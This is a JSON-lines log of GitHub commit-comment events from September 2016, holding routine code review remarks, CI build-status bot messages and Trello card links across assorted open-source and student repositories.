{"id":"4602772961","type":"CommitCommentEvent","actor":{"login":"testcc1"},"repo":{"name":"testcc1/Github_repo"},"payload":{"comment":{"id":19131059,"position":null,"line":null,"path":null,"commit_id":"6c1698a264de7103034c17a96ffe6a35bf2d05eb","created_at":"2016-09-22T14:23:35Z","updated_at":"2016-09-22T14:23:35Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://127.0.0.1:8080/ui#review:id=35)"}},"created_at":"2016-09-22T14:23:35Z"}
{"id":"4602774186","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19131063,"position":null,"line":null,"path":null,"commit_id":"a601645c36749607ff70b449cc9fa452448f7dab","created_at":"2016-09-22T14:23:46Z","updated_at":"2016-09-22T14:23:46Z","body":"Sizing-Simple-Chilled-Ceiling (RKStrand) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a601645c36749607ff70b449cc9fa452448f7dab-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-22T14:23:46Z"}
{"id":"4602777303","type":"CommitCommentEvent","actor":{"login":"ruddy12"},"repo":{"name":"UXT-team/site"},"payload":{"comment":{"id":19131071,"position":null,"line":null,"path":null,"commit_id":"c896361f9c6d4043fc2dcaf1219f1cad80e27b87","created_at":"2016-09-22T14:24:16Z","updated_at":"2016-09-22T14:24:16Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;PBbbuTbc&#x2F;26-as-the-product-owner-i-want-to-create-upload-interface-for-upload-songs-and-albumns-and-add-views-on-them\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> As the product owner i want to create upload interface for upload songs and albumns and add views on them</a>"}},"created_at":"2016-09-22T14:24:16Z"}
{"id":"4602778350","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/lager"},"payload":{"comment":{"id":19131076,"position":null,"line":null,"path":null,"commit_id":"fce24bc87685a36a68c4db846a86f6a646f0a920","created_at":"2016-09-22T14:24:25Z","updated_at":"2016-09-22T14:24:25Z","body":"all tests pass:\nsuccess: http://buildbot.bos1/builders/test-lager/builds/442\n"}},"created_at":"2016-09-22T14:24:25Z"}
{"id":"4602780805","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19131077,"position":25,"line":524,"path":"cura/BuildVolume.py","commit_id":"e0109a1857f85d8f53dd6983772ab671d94d77bd","created_at":"2016-09-22T14:24:48Z","updated_at":"2016-09-22T14:24:48Z","body":"This is hardly the \"skirt size\" any more, is it?\r\n\r\n(Not blocking.)"}},"created_at":"2016-09-22T14:24:48Z"}
{"id":"4602780885","type":"CommitCommentEvent","actor":{"login":"ruddy12"},"repo":{"name":"UXT-team/site"},"payload":{"comment":{"id":19131078,"position":null,"line":null,"path":null,"commit_id":"8c20aed978bac0c22b0177906b6706ad01a680e5","created_at":"2016-09-22T14:24:49Z","updated_at":"2016-09-22T14:24:49Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;HcBu943Z&#x2F;27-as-the-product-owner-i-want-to-generate-stats-for-admin-through-graphs-or-charts-to-monitor-reflect-their-download-history\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> As the product owner I want to Generate Stats for admin through graphs or charts to monitor&#x2F;reflect their download history</a>"}},"created_at":"2016-09-22T14:24:49Z"}
{"id":"4602782215","type":"CommitCommentEvent","actor":{"login":"sonora"},"repo":{"name":"osmandapp/Osmand"},"payload":{"comment":{"id":19131084,"position":null,"line":null,"path":null,"commit_id":"a8dbab836b16d328bbbbb8dbbc0c04ab8f987b41","created_at":"2016-09-22T14:25:01Z","updated_at":"2016-09-22T14:25:01Z","body":"Looks to me like maybe this commit here started Issue #3106. Once you had the Issue, downgrading to builds prior to this commit made the issue go away, but re-upgrading to a build containing this or even containing https://github.com/osmandapp/Osmand/commit/57ab67aeeb31c4b85d8e7082dcdf460a5f2a85f8 makes the issue immediately re-appear. I guess re-setting the app data will make the issue go away for good, but we should still double-check if our newest builds could again cause #3106, because it is quite a catastrophic issue leaving OsmAnd unusable to the average user not knowing how to resolve it."}},"created_at":"2016-09-22T14:25:01Z"}
{"id":"4602783574","type":"CommitCommentEvent","actor":{"login":"ruddy12"},"repo":{"name":"UXT-team/site"},"payload":{"comment":{"id":19131086,"position":null,"line":null,"path":null,"commit_id":"7ff93bfe17c8548a293a8d1f808c8a7fbb2474cb","created_at":"2016-09-22T14:25:14Z","updated_at":"2016-09-22T14:25:14Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;HcBu943Z&#x2F;27-as-the-product-owner-i-want-to-generate-stats-for-admin-through-graphs-or-charts-to-monitor-reflect-their-download-history\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> As the product owner I want to Generate Stats for admin through graphs or charts to monitor&#x2F;reflect their download history</a>"}},"created_at":"2016-09-22T14:25:14Z"}
{"id":"4602783932","type":"CommitCommentEvent","actor":{"login":"Sliim"},"repo":{"name":"JonTheNiceGuy/vagrantboxes-heroku"},"payload":{"comment":{"id":19131089,"position":null,"line":null,"path":null,"commit_id":"869eaa70ce15d5c71dcbbe0ceb71de21b3587600","created_at":"2016-09-22T14:25:17Z","updated_at":"2016-09-22T14:25:17Z","body":"Hi!\r\nsorry but this diff is incomplete, I added other boxes in #408 but they are missing in this commit.. maybe when you resolved conflicts? (in Large merge #421 PR)"}},"created_at":"2016-09-22T14:25:17Z"}
{"id":"4602788592","type":"CommitCommentEvent","actor":{"login":"smstuebe"},"repo":{"name":"xabre/xamarin-bluetooth-le"},"payload":{"comment":{"id":19131103,"position":null,"line":null,"path":null,"commit_id":"9ac8dc1b6f9c913ed17e29974e9c1c015c5f7cd3","created_at":"2016-09-22T14:25:58Z","updated_at":"2016-09-22T14:25:58Z","body":"And when gets `OnNameUpdated` called? o0"}},"created_at":"2016-09-22T14:25:58Z"}
{"id":"4602790020","type":"CommitCommentEvent","actor":{"login":"williampeer"},"repo":{"name":"digipost/ios"},"payload":{"comment":{"id":19131105,"position":null,"line":null,"path":null,"commit_id":"1acf9a0c395db62482ddafa2cb473f06d530187a","created_at":"2016-09-22T14:26:11Z","updated_at":"2016-09-22T14:26:11Z","body":"Unfortunately, these skeletons break when attempting to render the table view. In other words; it's a compiling, yet non-functional WIP."}},"created_at":"2016-09-22T14:26:11Z"}
{"id":"4602791954","type":"CommitCommentEvent","actor":{"login":"kha26"},"repo":{"name":"kha26/assignment04"},"payload":{"comment":{"id":19131107,"position":null,"line":null,"path":null,"commit_id":"3c7cafd721080268ad31544a6eb7eb3df0a2fc0e","created_at":"2016-09-22T14:26:30Z","updated_at":"2016-09-22T14:26:30Z","body":"Awesome commit."}},"created_at":"2016-09-22T14:26:30Z"}
{"id":"4602792036","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19131108,"position":null,"line":null,"path":null,"commit_id":"2e705b5122094c1a1cc013676a5c009290247bad","created_at":"2016-09-22T14:26:31Z","updated_at":"2016-09-22T14:26:31Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1121](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13962&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-22T14:26:31Z"}
{"id":"4602800219","type":"CommitCommentEvent","actor":{"login":"syl22-00"},"repo":{"name":"pculture/unisubs"},"payload":{"comment":{"id":19131132,"position":25,"line":233,"path":"apps/api/views/users.py","commit_id":"27b5c073345db3086ef925500c0913d7d833c9b9","created_at":"2016-09-22T14:27:48Z","updated_at":"2016-09-22T14:27:48Z","body":"@bendk I think this was not correct, right?"}},"created_at":"2016-09-22T14:27:48Z"}
{"id":"4602803557","type":"CommitCommentEvent","actor":{"login":"aravind-ramesh"},"repo":{"name":"aravind-ramesh/ceph"},"payload":{"comment":{"id":19131135,"position":275,"line":2257,"path":"src/osd/ECBackend.cc","commit_id":"7bbd4f05138d0c983bf1fcc27b12552c2814bb10","created_at":"2016-09-22T14:28:13Z","updated_at":"2016-09-22T14:28:13Z","body":"Done.\r\nDiff is here.\r\nhttps://github.com/aravind-ramesh/ceph/commit/170a940ab8b4f5f8a82df35207f04de2305ea090"}},"created_at":"2016-09-22T14:28:13Z"}
{"id":"4602815773","type":"CommitCommentEvent","actor":{"login":"asarfraaz"},"repo":{"name":"naveenbajaj123/python"},"payload":{"comment":{"id":19131169,"position":null,"line":null,"path":null,"commit_id":"3d37365a2fcf303c95a1d4b036a5692cbcff7d18","created_at":"2016-09-22T14:30:02Z","updated_at":"2016-09-22T14:30:02Z","body":"Congratulations Naveen,\r\n\r\nThis code is the most beautiful code submission that I have seen for the Chemical Plant problem. Enjoyed reading your code. The variable names made it is so easy to understand what is happening that I don't think I have to even bother to read the question to know what the code is doing. Very elegantly and neatly written. Keep it up !!!\r\n\r\nThere is a small mathematical error in this program though. Try debugging it by printing the suspected variables.\r\n\r\nThis is a sample run of this program that shows the error.\r\n############\r\npython checmical.py \r\nEnter the quanity500\r\nshut the valve\r\n############\r\n\r\nWhy should I shut the value when the present level is just above the midpoint ? Something is definitely not right here.\r\n\r\nThis is another sample run of this program that shows another error.\r\n############\r\npython checmical.py \r\nEnter the quanity899\r\nnormal level\r\n############\r\n\r\nHow can 899 be normal ? when the total capacity itself in 900 ? Shouldn't the code be sending an SMS  to stop the valve ?\r\n"}},"created_at":"2016-09-22T14:30:02Z"}
{"id":"4602818319","type":"CommitCommentEvent","actor":{"login":"andrewlouis93"},"repo":{"name":"Shopify/record_store"},"payload":{"comment":{"id":19131173,"position":null,"line":null,"path":null,"commit_id":"d4476fd5719caa500ea0907715e8f03cbc0d6803","created_at":"2016-09-22T14:30:23Z","updated_at":"2016-09-22T14:30:23Z","body":"@sbfaulkner is this something like what you had in mind? "}},"created_at":"2016-09-22T14:30:23Z"}
{"id":"4602820014","type":"CommitCommentEvent","actor":{"login":"samth"},"repo":{"name":"samth/lang-slide"},"payload":{"comment":{"id":19131177,"position":null,"line":null,"path":null,"commit_id":"40f565a984a76567156bbb169691b31371d9de0d","created_at":"2016-09-22T14:30:37Z","updated_at":"2016-09-22T14:30:37Z","body":"I don't think this works -- all the pkg related meta-data has to be in the pkg-level info.rkt."}},"created_at":"2016-09-22T14:30:37Z"}
{"id":"4602823520","type":"CommitCommentEvent","actor":{"login":"sbernard31"},"repo":{"name":"eclipse/californium"},"payload":{"comment":{"id":19131183,"position":68,"line":68,"path":"californium-core/src/main/java/org/eclipse/californium/core/network/BaseMatcher.java","commit_id":"49949b4ae4bfa8d041c405184a75b31ee859d1d9","created_at":"2016-09-22T14:31:06Z","updated_at":"2016-09-22T14:31:06Z","body":"`AtomicBoolean` is just not needed anymore as synchronization is covered by `synchronized` block.\r\n"}},"created_at":"2016-09-22T14:31:06Z"}
{"id":"4602826954","type":"CommitCommentEvent","actor":{"login":"vanDonselaar"},"repo":{"name":"adamw/elasticmq"},"payload":{"comment":{"id":19131200,"position":14,"line":64,"path":"project/Build.scala","commit_id":"4e8ff3780832e477c416737b5fdee03b54640585","created_at":"2016-09-22T14:31:37Z","updated_at":"2016-09-22T14:31:37Z","body":"Good catch!"}},"created_at":"2016-09-22T14:31:37Z"}
{"id":"4602827650","type":"CommitCommentEvent","actor":{"login":"sg-"},"repo":{"name":"ARMmbed/mbed-os"},"payload":{"comment":{"id":19131202,"position":68,"line":861,"path":"hal/targets.json","commit_id":"e68b550c2a3671f82d2a8e7a0b3d24df8e48c275","created_at":"2016-09-22T14:31:44Z","updated_at":"2016-09-22T14:31:44Z","body":"was merged. Just will need to make a new pr to fix"}},"created_at":"2016-09-22T14:31:44Z"}
{"id":"4602830701","type":"CommitCommentEvent","actor":{"login":"mythi"},"repo":{"name":"avalluri/ostro-os-xt"},"payload":{"comment":{"id":19131213,"position":null,"line":null,"path":null,"commit_id":"14ec64c61ae5612197e0fce0177566599f297a57","created_at":"2016-09-22T14:32:12Z","updated_at":"2016-09-22T14:32:12Z","body":"@avalluri please report this issue to meta-intel-realsense"}},"created_at":"2016-09-22T14:32:12Z"}
{"id":"4602831057","type":"CommitCommentEvent","actor":{"login":"olegendo"},"repo":{"name":"erikvarga/gcc"},"payload":{"comment":{"id":19131214,"position":null,"line":null,"path":null,"commit_id":"f854f87640051fc35d06a02283eac46d85af6740","created_at":"2016-09-22T14:32:15Z","updated_at":"2016-09-22T14:32:15Z","body":"It's generally a good idea to check the effects of each change with the CSiBE set (or some other benchmark).  Sometimes what you think is a good thing might not work out as expected.  Compiling and comparing the CSiBE takes only a few minutes. Some of your recent changes caused significant increases in some individual software packages/files in the set..."}},"created_at":"2016-09-22T14:32:15Z"}
{"id":"4602848339","type":"CommitCommentEvent","actor":{"login":"jonallured"},"repo":{"name":"hashrocket/dotmatrix"},"payload":{"comment":{"id":19131252,"position":7,"line":65,"path":"bin/install","commit_id":"3be4d7b8a5f70fca1aa86867e33b5276a2e24414","created_at":"2016-09-22T14:34:53Z","updated_at":"2016-09-22T14:34:53Z","body":"I don't know, is there a cuter way to echo this?"}},"created_at":"2016-09-22T14:34:53Z"}
{"id":"4602850617","type":"CommitCommentEvent","actor":{"login":"paramite"},"repo":{"name":"centos-opstools/opstools-ansible"},"payload":{"comment":{"id":19131258,"position":2,"line":2,"path":"roles/sensu/server/templates/sensu_oscheck-check-ceilometer_api.json.j2","commit_id":"7ad84af5012b8821080ccfc54a8610c5d91c6870","created_at":"2016-09-22T14:35:15Z","updated_at":"2016-09-22T14:35:15Z","body":"s/:::openstack.password{{ oscheck_default_password }}:::/:::openstack.password|{{ oscheck_default_password }}:::/"}},"created_at":"2016-09-22T14:35:15Z"}
{"id":"4602852019","type":"CommitCommentEvent","actor":{"login":"kkestell"},"repo":{"name":"sslotsky/violet-paginator"},"payload":{"comment":{"id":19131259,"position":null,"line":null,"path":null,"commit_id":"b9de3edb32747878551cdbd7262eb3eae8e73271","created_at":"2016-09-22T14:35:28Z","updated_at":"2016-09-22T14:35:28Z","body":"👌 "}},"created_at":"2016-09-22T14:35:28Z"}
{"id":"4602852122","type":"CommitCommentEvent","actor":{"login":"paramite"},"repo":{"name":"centos-opstools/opstools-ansible"},"payload":{"comment":{"id":19131260,"position":2,"line":2,"path":"roles/sensu/server/templates/sensu_oscheck-check-cinder_api.json.j2","commit_id":"7ad84af5012b8821080ccfc54a8610c5d91c6870","created_at":"2016-09-22T14:35:29Z","updated_at":"2016-09-22T14:35:29Z","body":"Ditto"}},"created_at":"2016-09-22T14:35:29Z"}
{"id":"4602854190","type":"CommitCommentEvent","actor":{"login":"sophokles73"},"repo":{"name":"eclipse/californium"},"payload":{"comment":{"id":19131264,"position":68,"line":68,"path":"californium-core/src/main/java/org/eclipse/californium/core/network/BaseMatcher.java","commit_id":"49949b4ae4bfa8d041c405184a75b31ee859d1d9","created_at":"2016-09-22T14:35:50Z","updated_at":"2016-09-22T14:35:50Z","body":"I know, but does it make any difference if we simply keep it? "}},"created_at":"2016-09-22T14:35:50Z"}
{"id":"4602854392","type":"CommitCommentEvent","actor":{"login":"sangisos"},"repo":{"name":"llir/llvm"},"payload":{"comment":{"id":19131265,"position":null,"line":null,"path":null,"commit_id":"b0e89e39f7c141218e388ac302d040b0dc727ca1","created_at":"2016-09-22T14:35:52Z","updated_at":"2016-09-22T14:35:52Z","body":"Yeah, sorry about the first commit. As you can tell, I don't really know what I'm doing. =)"}},"created_at":"2016-09-22T14:35:52Z"}
{"id":"4602855316","type":"CommitCommentEvent","actor":{"login":"LucaGaspa"},"repo":{"name":"LucaGaspa/mzn2omt"},"payload":{"comment":{"id":19131266,"position":4,"line":75,"path":"src/intervalSetLib/number.h","commit_id":"af126261eb0cd7b8918f91bee5852381dcc8cba2","created_at":"2016-09-22T14:36:00Z","updated_at":"2016-09-22T14:36:00Z","body":"same of mpq_to_smt2 method, but return normal float notation (i.e: 1.2)."}},"created_at":"2016-09-22T14:36:00Z"}
{"id":"4602855727","type":"CommitCommentEvent","actor":{"login":"paramite"},"repo":{"name":"centos-opstools/opstools-ansible"},"payload":{"comment":{"id":19131268,"position":2,"line":2,"path":"roles/sensu/server/templates/sensu_oscheck-check-glance_api.json.j2","commit_id":"7ad84af5012b8821080ccfc54a8610c5d91c6870","created_at":"2016-09-22T14:36:04Z","updated_at":"2016-09-22T14:36:04Z","body":"Ditto"}},"created_at":"2016-09-22T14:36:04Z"}
{"id":"4602856967","type":"CommitCommentEvent","actor":{"login":"paramite"},"repo":{"name":"centos-opstools/opstools-ansible"},"payload":{"comment":{"id":19131270,"position":2,"line":2,"path":"roles/sensu/server/templates/sensu_oscheck-check-neutron_api.json.j2","commit_id":"7ad84af5012b8821080ccfc54a8610c5d91c6870","created_at":"2016-09-22T14:36:14Z","updated_at":"2016-09-22T14:36:14Z","body":"Ditto"}},"created_at":"2016-09-22T14:36:14Z"}
{"id":"4602858167","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/lager"},"payload":{"comment":{"id":19131272,"position":null,"line":null,"path":null,"commit_id":"fce24bc87685a36a68c4db846a86f6a646f0a920","created_at":"2016-09-22T14:36:25Z","updated_at":"2016-09-22T14:36:25Z","body":"fast-forwarding master to borshop-integration-374-bugfix_dr_lager_file_backend_old_config_compat = e7b14646"}},"created_at":"2016-09-22T14:36:25Z"}
{"id":"4602858289","type":"CommitCommentEvent","actor":{"login":"paramite"},"repo":{"name":"centos-opstools/opstools-ansible"},"payload":{"comment":{"id":19131273,"position":2,"line":2,"path":"roles/sensu/server/templates/sensu_oscheck-check-nova_api.json.j2","commit_id":"7ad84af5012b8821080ccfc54a8610c5d91c6870","created_at":"2016-09-22T14:36:26Z","updated_at":"2016-09-22T14:36:26Z","body":"Ditto"}},"created_at":"2016-09-22T14:36:26Z"}
{"id":"4602862496","type":"CommitCommentEvent","actor":{"login":"henrinie"},"repo":{"name":"Signbank/FinSL-signbank"},"payload":{"comment":{"id":19131280,"position":null,"line":null,"path":null,"commit_id":"f52eb825f6f1dd77ec747f2f3e3efca615a8ea42","created_at":"2016-09-22T14:37:04Z","updated_at":"2016-09-22T14:37:04Z","body":"Ok, I could have chosen a better default id than 1.\r\nIf you have problems creating a new SignLanguage in the admin interface, and you get unique constraint error, just try creating it again."}},"created_at":"2016-09-22T14:37:04Z"}
{"id":"4602863382","type":"CommitCommentEvent","actor":{"login":"paramite"},"repo":{"name":"centos-opstools/opstools-ansible"},"payload":{"comment":{"id":19131284,"position":1,"line":1,"path":"roles/sensu/server/templates/sensu_oscheck_amqp.json.j2","commit_id":"7ad84af5012b8821080ccfc54a8610c5d91c6870","created_at":"2016-09-22T14:37:12Z","updated_at":"2016-09-22T14:37:12Z","body":"Ditto for all password parameters here"}},"created_at":"2016-09-22T14:37:12Z"}
{"id":"4602863861","type":"CommitCommentEvent","actor":{"login":"dawsonc623"},"repo":{"name":"rolfea/BlocRecord"},"payload":{"comment":{"id":19131286,"position":5,"line":5,"path":"assignment_methods.rb","commit_id":"d4082a0416bbcb5ce1b36803e42be95362d3ee20","created_at":"2016-09-22T14:37:16Z","updated_at":"2016-09-22T14:37:16Z","body":"They actually intend this method to work for any attribute and value combination, not just an arbitrary one."}},"created_at":"2016-09-22T14:37:16Z"}
{"id":"4602867531","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19131296,"position":null,"line":null,"path":null,"commit_id":"d5aff4e4f86ddd8e27db8a6f27670ca3ededc01b","created_at":"2016-09-22T14:37:49Z","updated_at":"2016-09-22T14:37:49Z","body":"Coverity is picky at times, so this may not clear the issue. We will get the result on the next submission. We only have a limited number of them per month, so we should wait until we need to perform a real scan against a major change.\r\n\r\nAlso see [Issue 298](http://github.com/weidai11/cryptopp/issues/298)."}},"created_at":"2016-09-22T14:37:49Z"}
{"id":"4602869765","type":"CommitCommentEvent","actor":{"login":"paramite"},"repo":{"name":"centos-opstools/opstools-ansible"},"payload":{"comment":{"id":19131302,"position":1,"line":1,"path":"roles/sensu/server/templates/sensu_oscheck_amqp.json.j2","commit_id":"7ad84af5012b8821080ccfc54a8610c5d91c6870","created_at":"2016-09-22T14:38:10Z","updated_at":"2016-09-22T14:38:10Z","body":"Also those checks should not be enclosed in \"checks\" key right? "}},"created_at":"2016-09-22T14:38:10Z"}
{"id":"4602870542","type":"CommitCommentEvent","actor":{"login":"simonrozsival"},"repo":{"name":"ReCodEx/api"},"payload":{"comment":{"id":19131304,"position":60,"line":60,"path":"app/model/entity/ReferenceSolutionEvaluation.php","commit_id":"13789e4222d100ab40282a153fff69b27e7d2b96","created_at":"2016-09-22T14:38:17Z","updated_at":"2016-09-22T14:38:17Z","body":"This should be very similar to the constructor of the App\\Model\\Entity\\SubmissionEvaluation class - score calculation + extraction of the memory/time stats for all the tests."}},"created_at":"2016-09-22T14:38:17Z"}
{"id":"4602872799","type":"CommitCommentEvent","actor":{"login":"paramite"},"repo":{"name":"centos-opstools/opstools-ansible"},"payload":{"comment":{"id":19131308,"position":10,"line":10,"path":"roles/sensu/server/templates/sensu_oschecks.json.j2","commit_id":"7ad84af5012b8821080ccfc54a8610c5d91c6870","created_at":"2016-09-22T14:38:38Z","updated_at":"2016-09-22T14:38:38Z","body":"this } is not necessary."}},"created_at":"2016-09-22T14:38:38Z"}
{"id":"4602878724","type":"CommitCommentEvent","actor":{"login":"geraldoriviarino"},"repo":{"name":"ferv95/projectoAgenda"},"payload":{"comment":{"id":19131322,"position":7,"line":7,"path":"Agenda/src/source/Contacto.java","commit_id":"7094a5a5e307414919e29644eb6935f509c1455e","created_at":"2016-09-22T14:39:32Z","updated_at":"2016-09-22T14:39:32Z","body":"PENEsito"}},"created_at":"2016-09-22T14:39:32Z"}
{"id":"4602879286","type":"CommitCommentEvent","actor":{"login":"paramite"},"repo":{"name":"centos-opstools/opstools-ansible"},"payload":{"comment":{"id":19131323,"position":1,"line":1,"path":"roles/sensu/server/templates/sensu_oscheck_amqp.json.j2","commit_id":"7ad84af5012b8821080ccfc54a8610c5d91c6870","created_at":"2016-09-22T14:39:37Z","updated_at":"2016-09-22T14:39:37Z","body":"Uhmm, actually isn't this duplicating all checks?"}},"created_at":"2016-09-22T14:39:37Z"}
{"id":"4602886053","type":"CommitCommentEvent","actor":{"login":"felixduvallet"},"repo":{"name":"epfl-lasa/robot-toolkit"},"payload":{"comment":{"id":19131344,"position":null,"line":null,"path":null,"commit_id":"970f35b35f6068fb187814fccf450c2392c2b98d","created_at":"2016-09-22T14:40:39Z","updated_at":"2016-09-22T14:40:39Z","body":"This commit won me a beer! Thanks @KlasKronander "}},"created_at":"2016-09-22T14:40:39Z"}
{"id":"4602889312","type":"CommitCommentEvent","actor":{"login":"niksmac"},"repo":{"name":"niksmac/mitd"},"payload":{"comment":{"id":19131352,"position":5,"line":26,"path":"sites/all/themes/mitds/views/views-view--messages--page.tpl.php","commit_id":"a8309efb55336b1ad1691a52ba8db0c42cb08203","created_at":"2016-09-22T14:41:10Z","updated_at":"2016-09-22T14:41:10Z","body":"I think we need more expressive message. "}},"created_at":"2016-09-22T14:41:10Z"}
{"id":"4602892492","type":"CommitCommentEvent","actor":{"login":"eri-trabiccolo"},"repo":{"name":"presscustomizr/front-jquery-plugins"},"payload":{"comment":{"id":19131366,"position":17,"line":72,"path":"jqueryimgSmartLoad.js","commit_id":"27ff4a0951ccd5a10208820c24af7a442d9c6227","created_at":"2016-09-22T14:41:40Z","updated_at":"2016-09-22T14:41:40Z","body":"ops :/"}},"created_at":"2016-09-22T14:41:40Z"}
{"id":"4602893789","type":"CommitCommentEvent","actor":{"login":"LucaGaspa"},"repo":{"name":"LucaGaspa/mzn2omt"},"payload":{"comment":{"id":19131371,"position":42,"line":48,"path":"src/literal.cpp","commit_id":"af126261eb0cd7b8918f91bee5852381dcc8cba2","created_at":"2016-09-22T14:41:51Z","updated_at":"2016-09-22T14:41:51Z","body":"probably not correct! to_str() is right because maintain smt2 concreteness.\r\nI'm going to changing it."}},"created_at":"2016-09-22T14:41:51Z"}
{"id":"4602899122","type":"CommitCommentEvent","actor":{"login":"rupl"},"repo":{"name":"rupl/bustashape"},"payload":{"comment":{"id":19131386,"position":12,"line":20,"path":"js/socket.js","commit_id":"9c2a9f13f09edc1dd551b645c15c0991de17f64d","created_at":"2016-09-22T14:42:37Z","updated_at":"2016-09-22T14:42:37Z","body":"This `join()` command inside a `reconnect` event listener was all that was needed to solve #79 "}},"created_at":"2016-09-22T14:42:37Z"}
{"id":"4602900475","type":"CommitCommentEvent","actor":{"login":"sophokles73"},"repo":{"name":"eclipse/californium"},"payload":{"comment":{"id":19131393,"position":213,"line":213,"path":"californium-core/src/main/java/org/eclipse/californium/core/network/InMemoryMessageExchangeStore.java","commit_id":"49949b4ae4bfa8d041c405184a75b31ee859d1d9","created_at":"2016-09-22T14:42:50Z","updated_at":"2016-09-22T14:42:50Z","body":"We should probably integrate Daniel's `TokenProvider` into the `MessageExchangeStore`. We can then *mark* the token we received the response for as *in use*, thus preventing it from being used in any other exchanges with the peer. Once the observation is cancelled (or timed out) we can then *free up* the token again.\r\nWDYT?"}},"created_at":"2016-09-22T14:42:50Z"}
{"id":"4602904473","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19131405,"position":null,"line":null,"path":null,"commit_id":"2e705b5122094c1a1cc013676a5c009290247bad","created_at":"2016-09-22T14:43:24Z","updated_at":"2016-09-22T14:43:24Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1121](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13962&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 245, ignored: 3 Build time: 00:16:53"}},"created_at":"2016-09-22T14:43:24Z"}
{"id":"4602909228","type":"CommitCommentEvent","actor":{"login":"LucaGaspa"},"repo":{"name":"LucaGaspa/mzn2omt"},"payload":{"comment":{"id":19131419,"position":76,"line":77,"path":"src/literal.cpp","commit_id":"af126261eb0cd7b8918f91bee5852381dcc8cba2","created_at":"2016-09-22T14:44:07Z","updated_at":"2016-09-22T14:44:07Z","body":"Here I need a \"float format\" instead of \"smt2 format\". This is the reason why I made that new method\r\n"}},"created_at":"2016-09-22T14:44:07Z"}
{"id":"4602911379","type":"CommitCommentEvent","actor":{"login":"jgdavey"},"repo":{"name":"hashrocket/dotmatrix"},"payload":{"comment":{"id":19131425,"position":7,"line":65,"path":"bin/install","commit_id":"3be4d7b8a5f70fca1aa86867e33b5276a2e24414","created_at":"2016-09-22T14:44:24Z","updated_at":"2016-09-22T14:44:24Z","body":"Nothing is cute in bash ;-)"}},"created_at":"2016-09-22T14:44:24Z"}
{"id":"4602920735","type":"CommitCommentEvent","actor":{"login":"W4lly63"},"repo":{"name":"W4lly63/HEARTHQUAKE-MISSION-MOD"},"payload":{"comment":{"id":19131439,"position":null,"line":null,"path":null,"commit_id":"4c9c82931b5bd4fd11f6f7e690fd367acee8bf8d","created_at":"2016-09-22T14:45:50Z","updated_at":"2016-09-22T14:45:50Z","body":"weapon classname updated"}},"created_at":"2016-09-22T14:45:50Z"}
{"id":"4602921222","type":"CommitCommentEvent","actor":{"login":"zajrik"},"repo":{"name":"zajrik/botframework-base"},"payload":{"comment":{"id":19131441,"position":null,"line":null,"path":null,"commit_id":"0b400b42baf4e8bc55a6194ae820c53b5803b9e2","created_at":"2016-09-22T14:45:54Z","updated_at":"2016-09-22T14:45:54Z","body":"Committed with the wrong message on the wrong project. Just removed an old comment line here."}},"created_at":"2016-09-22T14:45:54Z"}
{"id":"4602922383","type":"CommitCommentEvent","actor":{"login":"Nikeo"},"repo":{"name":"presscustomizr/front-jquery-plugins"},"payload":{"comment":{"id":19131445,"position":17,"line":72,"path":"jqueryimgSmartLoad.js","commit_id":"27ff4a0951ccd5a10208820c24af7a442d9c6227","created_at":"2016-09-22T14:46:06Z","updated_at":"2016-09-22T14:46:06Z","body":"shall I uncomment or did you simply forget to remove ? :)\r\n\r\nBy the way, wouldn't it be safer to check if the window.requestAnimationFrame object exists ?\r\n"}},"created_at":"2016-09-22T14:46:06Z"}
{"id":"4602924798","type":"CommitCommentEvent","actor":{"login":"LMESTM"},"repo":{"name":"ARMmbed/mbed-os"},"payload":{"comment":{"id":19131449,"position":68,"line":861,"path":"hal/targets.json","commit_id":"e68b550c2a3671f82d2a8e7a0b3d24df8e48c275","created_at":"2016-09-22T14:46:28Z","updated_at":"2016-09-22T14:46:28Z","body":"@sg: #2782 sent to fix - sorry about that "}},"created_at":"2016-09-22T14:46:28Z"}
{"id":"4602927503","type":"CommitCommentEvent","actor":{"login":"ErikMinekus"},"repo":{"name":"ErikMinekus/traktor-kontrol-screens"},"payload":{"comment":{"id":19131454,"position":null,"line":null,"path":null,"commit_id":"43d24f8935e17cff54c02f3a742a8d4d94ba0d51","created_at":"2016-09-22T14:46:51Z","updated_at":"2016-09-22T14:46:51Z","body":"What? This has nothing to do with how Traktor looks on your screen, you can't change that."}},"created_at":"2016-09-22T14:46:51Z"}
